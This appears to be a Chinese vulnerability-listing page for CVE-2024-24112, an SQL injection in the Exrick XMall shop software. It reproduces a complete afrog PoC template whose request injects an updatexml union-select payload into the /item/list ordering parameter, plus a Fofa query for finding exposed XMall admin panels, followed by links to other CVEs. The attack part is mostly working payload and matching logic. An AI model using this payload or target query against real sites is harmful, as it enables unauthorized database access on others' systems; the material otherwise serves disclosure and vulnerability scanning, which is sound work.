CVE-2024-24112: Exrick XMall 开源商城 SQL注入漏洞

日期: 2025-09-01 | 影响软件: Exrick XMall | POC: 已公开

漏洞描述

Fofa: app="XMall-后台管理系统"

PoC代码[已公开]

id: CVE-2024-24112

info:
  name: Exrick XMall 开源商城 SQL注入漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="XMall-后台管理系统"
  reference:
    - https://mp.weixin.qq.com/s/HqVQrUr6iRv94BmrVd_gOw
  tags: cve,cve2024,sqli
  created: 2024/02/21

set:
  randInt: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,md5({{randInt}}),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136
    expression: response.status == 200 && response.body.bcontains(b'XPATH syntax error:') && response.body.bcontains(bytes(substr(md5(string(randInt)),0,31)))
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2024/CVE-2024-24112.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2024-24112: Exrick XMall - SQL Injection POC

Exrick XMall 电商购物商城 CVE-2024-24112 SQL注入漏洞 无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

Whoogle search 代码执行漏洞（CVE-2024-53305） 无POC

Wordpress WooCommerce Ultimate Gift Card /wp-admin/admin-ajax.php mwb_wgm_preview_mail 文件上传漏洞（CVE-2024-8425） 无POC

Exrick XMall 电商购物商城 CVE-2024-24112 SQL注入漏洞无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893）无POC

Whoogle search 代码执行漏洞（CVE-2024-53305）无POC

Wordpress WooCommerce Ultimate Gift Card /wp-admin/admin-ajax.php mwb_wgm_preview_mail 文件上传漏洞（CVE-2024-8425）无POC